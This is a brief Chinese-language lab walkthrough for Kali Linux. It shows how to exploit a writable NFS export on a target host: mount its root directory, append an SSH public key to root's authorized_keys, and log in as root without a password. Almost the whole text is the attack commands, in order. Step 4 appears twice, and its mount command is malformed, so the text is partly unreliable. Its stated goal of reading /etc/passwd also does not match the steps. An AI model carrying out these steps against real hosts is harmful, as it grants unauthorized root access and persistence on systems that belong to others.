目的:
利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容
原理:
NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。
准备:
- Kali系统版本2.0
- 主机IP:192.168.1.2 靶机IP:192.168.1.3
实战:
Step1:查看目标主机上NFS服务是否开启:
在终端输入rpcinfo -p 192.168.1.3
Step2:显示指定的远程共享目录列表:
在终端输入showmount -e 192.168.1.3
Step3:生成rsa公钥:
在终端输入ssh-keygen
Step4:在终端输入mkdir /tmp/tool,建立tool目录;在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下Step4:在终端输入mkdir /tmp/tool,建立tool目录;在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下
Step5:把生成的公钥追加到靶机的authorized_keys下,实现ssh免密码登录:
在终端输入cat /root/.ssh/id_rsa.pub>>/tmp/tool/root/.ssh/authorized_keys
Step6:在终端输入ssh root@192.168.1.3